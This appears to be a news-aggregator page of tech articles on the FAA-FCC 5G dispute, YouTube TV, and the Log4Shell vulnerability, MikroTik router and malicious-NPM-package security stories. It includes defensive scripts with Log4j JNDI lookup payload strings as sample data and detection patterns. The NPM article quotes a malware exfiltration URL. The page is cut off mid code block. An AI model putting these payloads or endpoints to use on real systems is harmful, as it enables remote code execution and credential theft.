Categories
Tech

Ajit Pai and Tom Wheeler agree: The FAA is behaving badly in battle against FCC

Then-Federal Communications Commission Chairman Tom Wheeler (L) and FCC Commissioner Ajit Pai talk before testifying to the House Judiciary Committee on March 25, 2015 in Washington, DC.

Six former chairs of the Federal Communications Commission yesterday criticized the Federal Aviation Administration’s fight against a new 5G rollout on spectrum that the FCC has studied and deemed safe to use. Republicans Ajit Pai and Michael Powell joined with Democrats Tom Wheeler, Mignon Clyburn, Julius Genachowski, and Michael Copps in writing a letter describing their concerns about how the FAA has tried to undermine public confidence in the FCC’s decision-making process.

“The FAA should work with the FCC and the National Telecommunications and Information Administration (NTIA)… to assess and resolve the FAA’s concerns expeditiously, but this debate should not be fought publicly in a way that undermines consumer confidence in the process, nor should it require months of additional delays,” said the six former chairs’ letter, which was sent to FCC Chairwoman Jessica Rosenworcel and NTIA acting Administrator Evelyn Remaley.

The “FAA position threatens to derail the reasoned conclusions reached by the FCC after years of technical analysis and study,” the former chairs also wrote.

AT&T and Verizon have already delayed their 5G launches on the new spectrum to assuage the FAA’s concerns, but the carriers plan to move ahead with the deployments next month.

No evidence of harm

Nearly 40 other countries are using C-band spectrum for 5G without any reports of interference to airplanes’ radio altimeters. As we wrote previously, the FCC in February 2020 approved mobile carriers’ use of C-Band spectrum from 3.7 to 3.98 GHz only after analyzing the aviation industry’s interference claims and finding no credible evidence of harm to altimeters, which use spectrum from 4.2 to 4.4 GHz.

To be safe, the FCC required carriers to follow power limits and created a 220 MHz guard band that will remain unused to protect altimeters from any possible interference from 5G transmissions. The FCC decision said the aviation industry’s research was unrealistic and that “well-designed equipment should not ordinarily receive any significant interference (let alone harmful interference) given these circumstances.”

Over a year after the aviation industry’s objections were dismissed by the FCC due to a lack of evidence, unnamed FAA officials tried to revive the debate by leaking their concerns to The Wall Street Journal. The FAA followed that up by issuing a November 2 bulletin that warned of “potential adverse effects on radio altimeters” even though the FAA bulletin acknowledged there have been no “proven reports of harmful interference” in the many countries where this spectrum is already used.

Former chairs say FCC acted on the evidence

The former FCC chairs’ letter said the agency’s 2020 decision on C-band spectrum “followed almost two years of careful review of the public record,” during which other federal agencies were given the chance “to raise—and defend with reliable data—their concerns about interference from transitioning spectrum to new uses.”

“At the end of this process, an FCC decision is reached that reflects the input of all stakeholders and its technical experts on the effective transition of spectrum, consistent with its statutory charge to ensure that new systems do not cause harmful interference,” the former chairs wrote. “In turn, this decision-making approach provides wireless companies or other license holders with the confidence necessary to invest in the networks that will deliver the innovation that will ensure the US remains the technology leader of the world.”

That’s how it’s supposed to work, but the FAA actions threaten to derail the process, the letter concluded:

In this case, the FAA position threatens to derail the reasoned conclusions reached by the FCC after years of technical analysis and study. We encourage all stakeholders to work together toward a speedy resolution of the issues in this band, and to ensure these surprises do not become a recurring feature of American spectrum management in the future.

Credit: Source link


YouTube TV warns it may lose all Disney-owned channels amid contract dispute

YouTube app icon on a TV screen.

Getty Images | Chris McGrath

YouTube TV yesterday warned that it could lose all Disney-owned channels after Friday because of a contract dispute and said it will temporarily reduce its price by $15 a month if that happens.

“We’re now in negotiations with Disney to continue distributing their content on YouTube TV so you can continue watching everything from your favorite teams on ESPN to The Bachelor to Good Morning America. Our deal expires on Friday, December 17, and we haven’t been able to reach an equitable agreement yet, so we wanted to give you an early heads up so that you can understand your choices,” the Google-owned YouTube wrote in a blog post.

“[I]f we are unable to reach a deal by Friday, the Disney-owned channels will no longer be available on YouTube TV and we will decrease our monthly price by $15, from $64.99 to $49.99 (while this content remains off our platform),” the blog post said. YouTube noted that users can pause or cancel their YouTube TV subscriptions at any time and subscribe to the Disney Bundle for $13.99 a month.

YouTube’s statement that it wants “equitable” terms indicates that it is seeking a most-favored-nation (MFN) clause from Disney. “Our ask to Disney, as with all our partners, is to treat YouTube TV like any other TV provider—by offering us the same rates that services of a similar size pay, across Disney’s channels for as long as we carry them. If Disney offers us equitable terms, we’ll renew our agreement with them,” YouTube wrote.

When contacted by Ars, Disney said that the contract is scheduled to expire on Friday at 11:59 pm ET and covers “the ABC Owned Television Stations, the ESPN networks, the Disney channels, Freeform, the FX networks, and the National Geographic channels.” Disney expressed confidence that the companies can avoid a blackout:

Disney Media and Entertainment Distribution has a highly successful track record of negotiating such agreements with providers of all types and sizes across the country and is committed to working with Google to reach a fair, market-based agreement. We are optimistic that we can reach a deal and continue to provide their YouTube TV customers with our live sporting events and news coverage, plus kids, family, and general entertainment programming.

YouTube settled disputes with NBC and Roku

YouTube’s demand for an MFN clause was also one of the sticking points in its recent dispute with the Comcast-owned NBCUniversal. In that case, the companies had to agree to a short extension to avoid a blackout when the original contract expired. One day later, they announced a multiyear deal to keep NBC on YouTube TV.

The YouTube/NBC negotiations were contentious partly because NBCUniversal asked YouTube TV to bundle Peacock, the NBC streaming service that has apparently failed to get many paying subscribers. A Disney spokesperson told Ars that Disney did not ask YouTube TV to bundle Disney+.

A recent dispute between Roku and Google resulted in the YouTube TV app being pulled from the Roku Channel Store. Google and Roku reached a deal to end that impasse last week, one day before the regular YouTube app would have been removed from the Roku store.



Hackers launch over 840,000 attacks through Log4J flaw


Matejmo | Getty Images


Hackers including Chinese state-backed groups have launched more than 840,000 attacks on companies globally since last Friday through a previously unnoticed vulnerability in a widely used piece of open-source software called Log4J, according to researchers.

Cyber security group Check Point said the attacks relating to the vulnerability had accelerated in the 72 hours since Friday, and that at some points its researchers were seeing more than 100 attacks a minute.

Perpetrators include “Chinese government attackers,” according to Charles Carmakal, chief technology officer of cyber company Mandiant.

The flaw in Log4J allows attackers to easily gain remote control over computers running apps in Java, a popular programming language.

Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), told industry executives that the vulnerability was “one of the most serious I’ve seen in my entire career, if not the most serious,” according to US media reports. Hundreds of millions of devices are likely to be affected, she said.

Check Point said that in many cases, the hackers were taking control of computers to use them to mine cryptocurrency, or to become part of botnets, vast networks of computers that can be used to overwhelm websites with traffic, to send spam, or for other illegal purposes.

Both CISA and the UK’s National Cyber Security Centre have now issued alerts urging organizations to make upgrades related to the Log4J vulnerability, as experts attempt to assess the fallout. Amazon, Apple, IBM, Microsoft, and Cisco are among those that have rushed to put out fixes, but no severe breaches have been reported publicly so far.

The vulnerability is the latest to hit corporate networks, after the emergence of flaws in the past year in commonly used software from Microsoft and IT company SolarWinds. Both these weaknesses were initially exploited by state-backed espionage groups from China and Russia respectively.

Mandiant’s Carmakal said that Chinese state-backed actors were also attempting to exploit the Log4J bug but declined to share further details. Researchers at SentinelOne have also told media that they have observed Chinese hackers taking advantage of the vulnerability.

According to Check Point, nearly half of all attacks have been conducted by known cyber attackers. These included groups using Tsunami and Mirai—malware that turns devices into botnets, or networks used to launch remotely controlled hacks such as denial of service attacks. It also included groups using XMRig, a software that mines the hard-to-trace digital currency Monero.

“With this vulnerability, attackers gain almost unlimited power—they can extract sensitive data, upload files to the server, delete data, install ransomware or pivot to other servers,” Nicholas Sciberras, head of engineering at vulnerability scanner Acunetix, said. It was “astonishingly easy” to deploy an attack, he said, adding that it would “be exploited for months to come.”

The source of the vulnerability is faulty code developed by unpaid volunteers at the non-profit Apache Software Foundation, which runs multiple open source projects, raising questions about the security of vital parts of IT infrastructure. Log4J has been downloaded millions of times.

The flaw has existed unnoticed since 2013, experts say. Matthew Prince, chief executive of cyber group Cloudflare, said it started to be actively exploited from December 1, although there was no “evidence of mass exploitation until after public disclosure” from Apache the following week.

© 2021 The Financial Times Ltd. All rights reserved Not to be redistributed, copied, or modified in any way.



As Log4Shell wreaks havoc, payroll service reports ransomware attack


Getty Images

As the world is beset by Log4Shell, arguably the most severe vulnerability ever, one of the biggest human resources solutions providers is reporting a ransomware attack that has taken its systems offline, possibly for the next several weeks. So far, the company isn’t saying if that critical vulnerability was the means hackers used to breach the systems.

The company said on Sunday that services using the Kronos Private Cloud had been unavailable for the past day, with the attack taking down Kronos’ UKG Workforce Central, UKG TeleStaff, and Banking Scheduling Solutions services.

“At this time, we still do not have an estimated restoration time, and it is likely that the issue may require at least several days to resolve,” Kronos representative Leo Daley wrote. “We continue to recommend that our impacted customers evaluate alternative plans to process time and attendance data for payroll processing, to manage schedules, and to manage other related operations important to their organization.”

Ten hours after that advisory, Daley published an update reporting that the cause of the outage was ransomware and that it “may take up to several weeks to restore system availability.”

“We deeply regret the impact this is having on you, and we are continuing to take all appropriate actions to remediate the situation,” the Kronos representative wrote. “We recognize the seriousness of this issue and will provide another update within the next 24 hours.”

Neither advisory made any mention of the method the ransomware attackers used to breach the Kronos infrastructure. A banner notice at the top of each post, however, stated:

We are aware of the log4j vulnerability reported as CVE-2021-44228. We have preventative controls in our environments to detect and prevent exploitation attempts. We have invoked emergency patching processes to identify and upgrade impacted versions of log4j. We are aware of the widespread usage of log4j in the software industry and are actively monitoring our software supply chain for any advisories of 3rd party software that may be impacted by this vulnerability.

Kronos representatives responding to an email declined to say if a Log4Shell exploit against its systems was the cause of the initial compromise. It wouldn’t be a stretch, though, for that to be the case. Kronos cloud services rely heavily on Java, the software framework that Log4J is based on. The Log4Shell vulnerability, which gives hackers the ability to execute malicious code with elevated system privileges, is trivial to exploit. Often, an attack can be delivered simply by visiting a page with a browser whose user agent string carries the commands in plain text.

Kronos said it had retained cybersecurity experts and has notified authorities. It said customers’ on-premises services aren’t affected.

Separately, the IT arm of the Virginia state legislature reported suffering a ransomware attack late Friday, the Associated Press reported. The Legislative Automated Systems in 2019 purchased Java licenses, an indication that the IT group uses the software framework. While it’s unknown what the vector was for the breach, both its timing and the use of Java are consistent with the possibility that Log4Shell played a key role.

This post will be updated with any new information that comes to light.

Post updated to add detail about Virginia legislature ransomware attack.



The Log4Shell zeroday 4 days on. What is it and how bad is it really?


Log4Shell is the name given to a critical zeroday vulnerability that surfaced on Thursday when it was exploited in the wild in remote-code compromises against Minecraft servers. The source of the vulnerability was Log4J, a logging utility used by thousands if not millions of apps, including those used inside just about every enterprise on the planet. The Minecraft servers were the proverbial canary in the coal mine.

In the four days since, it’s clear Log4Shell is every bit as grave a threat as I claimed, with the list of cloud services affected reading like a who’s who of the biggest names on the Internet. Threat analysts and researchers are still assessing the damage so far and the outlook over the next weeks and months. Here’s what you need to know for now.

What’s Log4J and what makes Log4Shell such a big deal? Log4J is an open-source Java-based logging tool available from Apache. It has the ability to perform network lookups using the Java Naming and Directory Interface to obtain services from the Lightweight Directory Access Protocol. The end result: Log4j will interpret a log message as a URL, go and fetch it, and even execute any executable payload it contains with the full privileges of the main program. Exploits are triggered inside text using the ${} syntax, allowing them to be included in browser user agents or other commonly-logged attributes.

Here’s what exploits look like, as illustrated by Juniper Networks researchers:

Juniper Networks
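The same lookup syntax seen from the defender’s side: an added example (not from the article or from Juniper Networks) that scans access-log lines for the Log4j ${...} lookup tokens the text describes, in the user-controlled fields that applications routinely log (path, referer, user agent). The log lines, IP addresses and host names are constructed; the regexes are this example’s own assumptions, not a vendor signature.

```python
"""Detect Log4j lookup syntax in user-controlled web log fields.

Added example: the attack string travels in fields that applications log
(request path, referer, User-Agent), so a defender can scan access logs for
the ${...} lookup syntax. Benign clients never send lookup syntax.
"""
import re
from urllib.parse import unquote

# Combined log format: ip - user [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Any Log4j lookup: ${prefix:...}. The prefix is deliberately not pinned to
# "jndi", because a plain ${var} placeholder (no colon) is harmless while any
# prefixed lookup arriving from a client is suspicious.
LOOKUP_RE = re.compile(r'\$\{[^}]*:[^}]*\}')

def normalize(value: str) -> str:
    """Undo a bounded number of percent-encoding layers (proxies and clients
    often encode once; the bound keeps hostile input from looping us)."""
    prev = None
    for _ in range(3):
        if value == prev:
            break
        prev, value = value, unquote(value)
    return value

def find_lookups(line: str):
    """Return [(field, matched_token)] for every lookup token in one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    for field in ("user", "path", "referer", "ua"):
        text = normalize(m.group(field))
        for tok in LOOKUP_RE.findall(text):
            hits.append((field, tok))
    return hits

def scan(lines):
    """Return (total_lines, [(line_no, field, token)]) for an iterable of log lines."""
    findings, total = [], 0
    for n, line in enumerate(lines, 1):
        total += 1
        for field, tok in find_lookups(line.rstrip("\n")):
            findings.append((n, field, tok))
    return total, findings

# Constructed sample lines (not real traffic); addresses are documentation
# ranges and the lookup host is a reserved example name.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://lookup.example.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2Flookup.example.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.2 - - [10/Dec/2021:14:02:14 +0000] "POST /api HTTP/1.1" 200 12 "https://shop.example/?price=${amount}" "Mozilla/5.0"',
]

if __name__ == "__main__":
    total, findings = scan(SAMPLE_LOG)
    print(f"scanned {total} lines, {len(findings)} lookup token(s)")
    for n, field, tok in findings:
        print(f"  line {n}: {field} contains {tok}")
```

The fourth sample line is kept deliberately: a bare ${amount} placeholder in a referer is not a lookup and must not be flagged, which is why the pattern requires a colon.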

The vulnerability, tracked as CVE-2021-44228, has a severity rating of 10 out of 10. The zeroday had been exploited for at least nine days before it surfaced.

Researchers at Cisco’s Talos security team said they observed exploits beginning December 2.

What has happened since Log4Shell surfaced last Thursday? Almost immediately, security firm Greynoise detected active scanning attempting to identify vulnerable servers. Researchers report seeing this critical and easy-to-exploit vulnerability being used to install crypto-mining malware, bolster Linux botnets, and exfiltrate configurations, environment variables, and other potentially sensitive data from vulnerable servers.

What’s the prognosis? In a best-case scenario, major brokerages, banks, and merchants will invest huge sums in overtime costs to pay large numbers of already overworked IT employees to mop up this mess during the holidays. You don’t want to think about the worst-case scenario, other than to remember the 2017 breach of Equifax, and the resulting compromise of 143 million US consumers’ data that followed when that company failed to patch against a similarly devastating vulnerability.

Sounds bad. What should I do? Yeah, it is. If you’re an end user, there’s not much you can do other than to hound the services you use and ask what they’re doing to keep the data you entrust to them secure. The most useful thing the cloud services can do is to update Log4J. But for large enterprises, it’s often not that simple. Dozens of security companies have published guidance. Advice from Microsoft and Sophos is here and here.




The Internet’s biggest players are all affected by critical Log4Shell 0-day


The list of services with Internet-facing infrastructure that is vulnerable to a critical zero-day vulnerability in the open source Log4j logging utility is immense and reads like a who’s who of the biggest names on the Internet, including Apple, Amazon, Cloudflare, Steam, Tesla, Twitter, and Baidu.

The vulnerability, now going by the name Log4Shell, came to light on Thursday afternoon, when several Minecraft services and news sites warned of actively circulating attack code that exploited the vulnerability to execute malicious code on servers and clients running the world’s bestselling game. Soon, it became clear that Minecraft was only one of likely thousands of big-name services that can be felled by similar attacks.

A compilation of screenshots posted online documents how some of the world’s most popular and trusted cloud-based services react when they are fed parameters used in the attack. To wit:

The images use a domain name system leak detection service called dnslog.cn to see if the target cloud service is performing a DNS lookup. Each image shows the service accepting connections from an attacker-controlled machine (as evidenced by the IP connection log).

“Normally, typing something into a username box should never be making any external network connections, so the fact that it does proves that Log4j is being used here and therefore that the server may be vulnerable to the remote code execution attack,” Ars reader skizzerz explained in the comments below.

While the images show the services responding in unintended and potentially dangerous ways to the user input, the services aren’t automatically vulnerable to the types of code-execution attacks that compromised Minecraft servers. That’s because these services typically have multiple layers of defense. If one layer fails, additional layers are often available to lessen or completely eliminate any real damage.

Then again, the images demonstrate that unauthorized people can exploit Log4Shell to access the servers of some of the world’s most powerful corporations in ways they never intended. Asked about the access to Apple servers, Malwarebytes director of Mac offerings Thomas Reed said: “This is far worse than if individual devices were vulnerable, and I think it’s an open question at this point exactly what kind of data attackers are probably pulling from Apple’s services as we speak.” Apple representatives didn’t respond to an email seeking comment.

Cloudflare, meanwhile, said in a post that it has taken steps to block attacks on its network and against its customers. Cloudflare Chief Security Officer Joe Sullivan said his team has been unable to reproduce the behavior depicted in the image and doesn’t recognize the IP addresses shown.

Minecraft on Friday rolled out a fix.

The takeaway is that it’s too early now to say these services aren’t vulnerable. For the time being, people should remain wary and await guidance from affected providers.

Listing image by Jeffrey Coolidge / Getty Images



Zeroday in ubiquitous Log4j tool poses a grave threat to the Internet


Getty Images

Exploit code has been released for a serious code-execution vulnerability in Log4j, an open-source logging utility that’s used in countless apps, including those used by large enterprise organizations, several websites reported last Thursday.

Word of the vulnerability first came to light on sites catering to users of Minecraft, the best-selling game of all time. The sites warned that hackers could execute malicious code on servers or clients running the Java version of Minecraft by manipulating log messages, including from things typed in chat messages. The picture became more dire still as Log4j was identified as the source of the vulnerability and exploit code was discovered posted online.

A big deal

“The Minecraft side seems like a perfect storm, but I suspect we are going to see affected applications and devices continue to be identified for a long time,” HD Moore, founder and CTO of network discovery platform Rumble, said. “This is a big deal for environments tied to older Java runtimes: Web front ends for various network appliances, older application environments using legacy APIs, and Minecraft servers, due to their dependency on older versions for mod compatibility.”

There are already reports of servers performing Internet-wide scans in attempts to locate vulnerable servers.

Log4j is incorporated into a host of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink. That means that a dizzying number of third-party apps may also be vulnerable to exploits that carry the same high severity as those threatening Minecraft users.

At the time this post went live, there wasn’t much known about the vulnerability. One of the few early sources providing a tracking number for the vulnerability was Github, which said it’s CVE-2021-44228. Security firm Cyber Kendra late Thursday reported a Log4j RCE zeroday being dropped on the Internet and concurred with Moore that “there are currently many popular systems on the market that are affected.”

The Apache Foundation has yet to disclose the vulnerability, and representatives there didn’t respond to an email. This Apache page does acknowledge the recent fixing of a serious vulnerability. Moore and other researchers said the Java deserialization bug stems from Log4j making network requests through the JNDI to an LDAP server and executing any code that’s returned. The bug is triggered inside of log messages with use of the ${} syntax.

Additional reporting from security firm LunaSec said that Java versions greater than 6u211, 7u201, 8u191, and 11.0.1 aren’t affected by this attack vector. In these versions the JNDI can’t load a remote codebase using LDAP.

LunaSec went on to say that cloud services from Steam and Apple iCloud have also been found to be affected. Company researchers also pointed out that a different high-severity vulnerability in struts led to the 2017 compromise of Equifax, which spilled sensitive details for more than 143 million US consumers.

Cyber Kendra said that in November the Alibaba Cloud security team disclosed a vulnerability in Log4j2—the successor to Log4j—that stemmed from recursive analysis functions, which attackers could exploit by constructing malicious requests that triggered remote code execution. The firm strongly urged people to use the latest version of Log4j2 available here.

What it means for Minecraft

The Spigot gaming forum said that Minecraft versions 1.8.8 through the most current 1.18 release are all vulnerable, as did other popular game servers such as Wynncraft. Gaming server and news site Hypixel, meanwhile, urged Minecraft players to take extra care.

“The issue can allow remote access to your computer through the servers you log into,” site representatives wrote. “That means any public server you go onto creates a risk of being hacked.”

Reproducing exploits for this vulnerability in Minecraft isn’t straightforward, because success depends not only on the Minecraft version running but also on the version of the Java framework the Minecraft app is running on top of. It appears that older Java versions have fewer built-in security protections, which makes exploits easier.

Spigot and other sources have said that adding the JVM flag -Dlog4j2.formatMsgNoLookups=true neutralizes the threat for most Java versions. Spigot and many other services have already inserted the flag into the games they make available to users.

To add the flag users should go to their launcher, open the installations tab, select the installation in use and click “…” > “Edit” > “MORE OPTIONS”, and paste -Dlog4j2.formatMsgNoLookups=true at the end of the JVM flags.

For the time being, people should pay close attention to this vulnerability and its potential to trigger high-impact attacks against a wide variety of apps and services. For Minecraft users, that means steering clear of unknown servers or untrustworthy users. For users of open-source software, it means checking to see if it relies on Log4j or Log4j2 for logging. This is a breaking story. Updates will follow if more information becomes available.
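One way to do the “does it rely on Log4j” check the paragraph above calls for, as an added example that is not from the article or from any of the vendors it quotes: walk a directory of JAR files, look inside each (including JARs nested in fat JARs and WARs, where a filename search misses them) and report the bundled Log4j version and whether the class that implements the JNDI lookup is present. The fixture JARs are constructed stand-ins; the manifest field names are assumed to match those a Log4j core JAR carries, and deciding which reported version counts as fixed is left to the reader.

```python
"""Inventory Log4j inside a tree of JAR/WAR/EAR files.

Added example: build tools repackage libraries, so the version in a filename
is unreliable. This walks a tree, opens every archive (recursively), reads the
manifest and checks for the JNDI lookup class.
"""
import io
import os
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"
ARCHIVE_EXT = (".jar", ".war", ".ear")

def parse_manifest(data: bytes) -> dict:
    """Parse 'Key: value' manifest lines; a continuation line starts with one space
    and is appended to the previous value without a separator."""
    fields, last = {}, None
    for raw in data.decode("utf-8", "replace").splitlines():
        if raw.startswith(" ") and last:
            fields[last] += raw[1:]
        elif ":" in raw:
            key, _, val = raw.partition(":")
            last = key.strip()
            fields[last] = val.lstrip(" ")
    return fields

def inspect_jar(zf: zipfile.ZipFile, label: str, results: list) -> None:
    """Record Log4j evidence found in one open archive, then recurse into nested ones."""
    names = set(zf.namelist())
    manifest = parse_manifest(zf.read(MANIFEST)) if MANIFEST in names else {}
    title = manifest.get("Implementation-Title", "") or manifest.get("Bundle-Name", "")
    if "log4j" in title.lower() or JNDI_CLASS in names:
        results.append({
            "jar": label,
            "version": manifest.get("Implementation-Version", "unknown").strip(),
            "jndi_lookup_present": JNDI_CLASS in names,
        })
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_EXT):
            with zf.open(name) as inner:
                data = inner.read()
            try:
                with zipfile.ZipFile(io.BytesIO(data)) as nested:
                    inspect_jar(nested, f"{label}!/{name}", results)
            except zipfile.BadZipFile:
                pass  # not a real archive despite the extension

def scan_tree(root: str) -> list:
    """Return one finding dict per Log4j occurrence under root."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                try:
                    with zipfile.ZipFile(path) as zf:
                        inspect_jar(zf, path, results)
                except zipfile.BadZipFile:
                    pass
    return results

def build_sample_tree(root: str) -> None:
    """Constructed fixture: a fat JAR embedding a fake log4j-core plus an unrelated
    JAR. The class entry is empty; this exercises layout, not real library code."""
    os.makedirs(root, exist_ok=True)
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as z:
        z.writestr(MANIFEST, "Manifest-Version: 1.0\r\nImplementation-Title: Apache Log4j Core\r\n"
                             "Implementation-Version: 2.14.1\r\n")
        z.writestr(JNDI_CLASS, b"")
    with zipfile.ZipFile(os.path.join(root, "app-all.jar"), "w") as z:
        z.writestr(MANIFEST, "Manifest-Version: 1.0\r\nMain-Class: example.App\r\n")
        z.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", core.getvalue())
    with zipfile.ZipFile(os.path.join(root, "other-lib.jar"), "w") as z:
        z.writestr(MANIFEST, "Manifest-Version: 1.0\r\nImplementation-Title: Other Lib\r\n")
        z.writestr("com/example/Other.class", b"")

def demo() -> list:
    """Build the constructed fixture in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)

if __name__ == "__main__":
    for f in demo():
        print(f"{f['jar']}: log4j {f['version']}, JndiLookup present={f['jndi_lookup_present']}")
```

Point scan_tree at a real application directory to get the same report; the outer fat JAR itself is not reported because only the nested library carries the Log4j manifest and class.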




300,000 MikroTik routers are ticking security time bombs, researchers say


Getty Images

As many as 300,000 routers made by Latvia-based MikroTik are vulnerable to remote attacks that can surreptitiously corral the devices into botnets that steal sensitive user data and participate in Internet-crippling DDoS attacks, researchers said.

The estimate, made by researchers at security firm Eclypsium, is based on Internet-wide scans that searched for MikroTik devices using firmware versions known to contain vulnerabilities that were discovered over the past three years. While the manufacturer has released patches, the Eclypsium research shows that a significant proportion of users have yet to install them.

“Given the challenges of updating MikroTik, there are large numbers of devices with these 2018 and 2019 vulnerabilities,” Eclypsium researchers wrote in a post. “Collectively, this gives attackers many opportunities to gain full control over very powerful devices, positioning them to be able to target devices both behind the LAN port as well as target other devices on the Internet.”

Embraced by script kiddies and nation-states alike

The concern is far from theoretical. In early 2018, researchers at security firm Kaspersky said that a powerful nation-state malware called Slingshot, which had gone undetected for six years, initially spread through MikroTik routers. The attacks downloaded malicious files from vulnerable routers by abusing a MikroTik configuration utility known as Winbox, which transferred the payloads from the device file system to a connected computer.

A few months later, researchers at security firm Trustwave discovered two malware campaigns against MikroTik routers after reverse engineering a CIA tool leaked in a WikiLeaks series known as Vault7.

Also in 2018, China’s Netlab 360 reported that thousands of MikroTik routers had been swept into a botnet by malware attacking a vulnerability tracked as CVE-2018-14847.

The Eclypsium researchers said that CVE-2018-14847 is one of at least three high-severity vulnerabilities that remain unpatched in the Internet-connected MikroTik devices they tracked. Combined with two other vulnerabilities located in Winbox—CVE-2019-3977 and CVE-2019-3978—Eclypsium found 300,000 vulnerable devices. Once hackers infect a device, they typically use it to launch further attacks, steal user data, or participate in distributed denial-of-service attacks.

The researchers have released a free software tool that people can use to detect if their MikroTik device is either vulnerable or infected. The company also provides other suggestions for locking down the devices. As always, the best way to secure a device is to ensure it’s running the latest firmware. It’s also important to replace default passwords with strong ones and turn off remote administration unless it’s necessary.



Malicious NPM packages are part of a malware “barrage” hitting repositories


Researchers have found another 17 malicious packages in an open source repository, as the use of such repositories to spread malware continues to flourish.

This time, the malicious code was found in NPM, where 11 million developers trade more than 1 million packages among each other. Many of the 17 malicious packages appear to have been spread by different threat actors who used varying techniques and amounts of effort to trick developers into downloading malicious wares instead of the benign ones intended.

This latest discovery continues a trend first spotted a few years ago, in which miscreants sneak information stealers, keyloggers, or other types of malware into packages available in NPM, RubyGems, PyPI, or another repository. In many cases, the malicious package has a name that’s a single letter different from a legitimate package. Often, the malicious package includes the same code and functionality as the package being impersonated and adds concealed code that carries out additional nefarious actions.

A ripe attack vector

“We are witnessing a recent barrage of malicious software hosted and delivered through open-source software repositories,” JFrog researchers Andrey Polkovnychenko and Shachar Menashe wrote on Wednesday. “Public repositories have become a handy instrument for malware distribution: the repository’s server is a trusted resource, and communication with it does not raise the suspicion of any antivirus or firewall. In addition, the ease of installation via automation tools such as the npm client, provides a ripe attack vector.”

Most of the packages JFrog flagged stole credentials or other information for Discord servers. Discord has become a popular platform for people to communicate through text, voice, and video. Compromised servers can be used as command and control channels for botnets or as a proxy when downloading data from a hacked server. Some packages stole credit card data associated with hacked Discord accounts.

Two packages—discord-lofy and discord-selfbot-v14—came from an author using the name davisousa. They masquerade as modifications of the popular legitimate library discord.js, which enables interaction with the Discord API. The malware incorporates the original discord.js library as its base and then injects obfuscated malicious code into one of the package files.

The JFrog researchers wrote:

The obfuscated version of the code is enormous: more than 4,000 lines of unreadable code, containing every possible method of obfuscation: mangled variable names, encrypted strings, code flattening and reflected function calls:

Through manual analysis and scripting, we were able to deobfuscate the package and reveal that its final payload is quite straightforward—the payload simply iterates over the local storage folders of well-known browsers (and Discord-specific folders), then searches them for strings looking like a Discord token by using a regular expression. Any found token is sent back via HTTP POST to the hardcoded server https://aba45cf.glitch.me/polarlindo.

Another package named fix-error claimed to fix errors in a Discord “selfbot.” It, too, contained malicious code that had been obfuscated but, in this case, was much easier for the researchers to deobfuscate. The researchers soon determined that the hidden code was a stolen version of the PirateStealer, an app that steals credit card information, login credentials, and other private data stored in a Discord client. It works by injecting malicious JavaScript code into the Discord client. The code then “spies” on the user and sends the stolen information to a hardcoded address.

A third example is prerequests-xcode, a package that contains remote access trojan functionality. The researchers wrote:

When inspecting the package’s code, we identified it contains a Node.JS port of DiscordRAT (originally written in Python) which gives an attacker full control over the victim’s machine. The malware is obfuscated with the popular online tool obfuscator.io, but in this case it is enough to inspect the list of available commands to understand the RAT’s functionality (copied verbatim).

The full list of packages is:

| Package | Version | Payload | Infection Method |
| --- | --- | --- | --- |
| prerequests-xcode | 1.0.4 | Remote Access Trojan (RAT) | Unknown |
| discord-selfbot-v14 | 12.0.3 | Discord token grabber | Typosquatting/Trojan (discord.js) |
| discord-lofy | 11.5.1 | Discord token grabber | Typosquatting/Trojan (discord.js) |
| discordsystem | 11.5.1 | Discord token grabber | Typosquatting/Trojan (discord.js) |
| discord-vilao | 1.0.0 | Discord token grabber | Typosquatting/Trojan (discord.js) |
| fix-error | 1.0.0 | PirateStealer (Discord malware) | Trojan |
| wafer-bind | 1.1.2 | Environment variable stealer | Typosquatting (wafer-*) |
| wafer-autocomplete | 1.25.0 | Environment variable stealer | Typosquatting (wafer-*) |
| wafer-beacon | 1.3.3 | Environment variable stealer | Typosquatting (wafer-*) |
| wafer-caas | 1.14.20 | Environment variable stealer | Typosquatting (wafer-*) |
| wafer-toggle | 1.15.4 | Environment variable stealer | Typosquatting (wafer-*) |
| wafer-geolocation | 1.2.10 | Environment variable stealer | Typosquatting (wafer-*) |
| wafer-image | 1.2.2 | Environment variable stealer | Typosquatting (wafer-*) |
| wafer-form | 1.30.1 | Environment variable stealer | Typosquatting (wafer-*) |
| wafer-lightbox | 1.5.4 | Environment variable stealer | Typosquatting (wafer-*) |
| octavius-public | 1.836.609 | Environment variable stealer | Typosquatting (octavius) |
| mrg-message-broker | 9998.987.376 | Environment variable stealer | Dependency confusion |
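The name-based tricks in the table above (names one edit away from a popular package, and the dependency-confusion entry) are exactly what a manifest audit can catch before `npm install` runs anything. What follows is an added example, not JFrog’s tooling or any package’s code: it scores each dependency name against a small allowlist of well-known packages using edit distance plus a separator-insensitive normalisation, and flags internal-looking names that a lockfile would resolve from the public registry. The allowlist, the `acme-` internal prefix, the private registry URL and the sample manifest are all constructed for illustration.

```javascript
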